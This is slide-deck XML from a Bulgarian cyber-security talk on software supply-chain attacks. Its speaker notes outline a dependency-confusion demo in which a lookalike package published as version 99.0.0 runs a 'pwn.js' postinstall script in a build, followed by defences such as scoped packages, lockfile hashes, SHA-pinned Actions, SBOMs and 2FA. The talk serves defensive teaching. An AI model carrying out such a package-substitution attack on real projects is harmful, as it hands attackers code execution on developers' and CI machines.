              <a:t>име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по-висока</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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публичния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Зле</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>конфигуриран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> resolver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>предпочита</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публичния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>по-висок</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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неговият</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postinstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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изпълнява</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вътре</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нашия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> build. </a:t>
            </a:r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живо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публикувам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lookalike-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пускам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install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>без</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scope lock,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виждаме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>как</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 99.0.0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публичния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>печели</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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изпълнява</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Корекцията</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: scoped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакети</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>частен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registry </a:t>
            </a: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lockfile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хешове</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>точно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>защитите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>предишните</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>слайдове</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>Тука една </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" err="1"/>
              <a:t>вметка</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BG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npm 11 вече </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BG" sz="1100" b="1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блокира install-скриптове по подразбиране</a:t>
            </a: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86B2AD42-E6B8-8F8E-FDD7-298FFAB6813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800118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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A00C721A-1726-BBF6-3046-D297F4898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:notes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BEF119B-9E39-65F6-18CC-41A85B2D25C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затворим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>неща</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>които</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всеки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>може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направи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>още</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>утре</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: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pin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commit SHA;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минете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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ci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CI;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генерирайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>още</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>днес</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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отговаряте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>бързо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>после</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>включете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2FA/passkeys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всеки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>акаунт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;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добавете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cooldown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нови</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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И</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>обратно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>началния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>въпрос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>следващия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>път</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>когато</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пуснете</a:t>
            </a:r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install, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>се</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>запитайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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кого</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>току-що</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дадох</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>на</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>машината</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>си</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a: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bg-BG" dirty="0"/>
          </a:p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Благодаря</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p3:notes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86E9612-7BBE-1288-A1E4-D2DA3B98206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8354970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2dd5d6240d7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dirty="0" err="1"/>
              <a:t>Благодаря</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Въпроси</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Да</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>поговорим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>за</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>това</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>какво</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дръпнахте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тази</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сутрин</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>www.kaloyangeorgiev.space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>viewer.html?deck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=cyber-security</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG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n-GB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GB" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/Fireblade89/supply-chain-demo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276" name="Google Shape;276;g2dd5d6240d7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line Slide">
  <p:cSld name="Headline Slid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6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" name="Google Shape;8;p6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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;9;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="3035656"/>
            <a:ext cx="9483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endParaRPr sz="4000" b="1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0" name="Google Shape;10;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="4341762"/>
            <a:ext cx="9483600" cy="4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1" name="Google Shape;11;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189344" y="1823307"/>
            <a:ext cx="3154500" cy="2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" name="Google Shape;12;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189396" y="2145049"/>
            <a:ext cx="3873600" cy="2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endParaRPr sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="69F1A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3" name="Google Shape;1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8400" y="-5"/>
            <a:ext cx="3518450" cy="19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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="3035656"/>
            <a:ext cx="9483725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body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="4341762"/>
            <a:ext cx="9483725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None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6" name="Google Shape;16;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189344" y="1823307"/>
            <a:ext cx="3154362" cy="286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F1AE"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="1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body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189396" y="2145049"/>
            <a:ext cx="38735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9F1AE"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="1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9F1AE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rgbClr val="69F1AE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8" name="Google Shape;18;p6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382703" y="1344842"/>
            <a:ext cx="1488000" cy="1415400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Google Shape;1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263" y="624713"/>
            <a:ext cx="5143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53486" y="6373609"/>
            <a:ext cx="844209" cy="1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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697601" y="6312341"/>
            <a:ext cx="4502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Cyber Security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out photo">
  <p:cSld name="Slide without photo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0" name="Google Shape;120;p8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pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Google Shape;12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8400" y="-5"/>
            <a:ext cx="3518450" cy="192301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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360557" y="1459724"/>
            <a:ext cx="4598100" cy="17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Montserrat"/>
              <a:buNone/>
              <a:defRPr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3" name="Google Shape;123;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354139" y="4042172"/>
            <a:ext cx="3771900" cy="5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None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ontserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="24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ontserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800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24" name="Google Shape;124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263" y="624713"/>
            <a:ext cx="514350" cy="40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753486" y="6373609"/>
            <a:ext cx="844209" cy="1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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697601" y="6312341"/>
            <a:ext cx="4502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Cyber Security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 1">
  <p:cSld name="Thank you slide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dd5d6240d7_1_173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="0"/>
            <a:ext cx="12192000" cy="60177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69F1A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g2dd5d6240d7_1_173"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="6009" b="6008"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6017701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="374EFD"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3844C6"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400700" scaled="0"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;g2dd5d6240d7_1_173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049235" y="819254"/>
            <a:ext cx="3370500" cy="7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Thank you!</a:t>
            </a:r>
            <a:endParaRPr sz="4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2" name="Google Shape;152;g2dd5d6240d7_1_17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492731"/>
            <a:ext cx="12191998" cy="2607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g2dd5d6240d7_1_17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753486" y="6373609"/>
            <a:ext cx="844209" cy="16997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g2dd5d6240d7_1_173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697601" y="6312341"/>
            <a:ext cx="4502700" cy="2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en-US" sz="1300" b="0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Следете актуалните обяви за </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cyber Security</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4F4F4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1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pac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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382701" y="4367262"/>
            <a:ext cx="9483725" cy="415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Clr>
                <a:srgbClr val="4F4F4F"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-BG" b="1" dirty="0"/>
              <a:t>One Vendor, Thousands of Victims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4F4F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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EEDA7389-A875-A10E-6044-E52579C161C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="5"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="10608" r="10608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382702" y="954848"/>
            <a:ext cx="1487487" cy="1416050"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382701" y="2534629"/>
            <a:ext cx="574424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4F4F4F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="bg-BG" b="1" dirty="0"/>
              <a:t>Калоян Георгиев</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
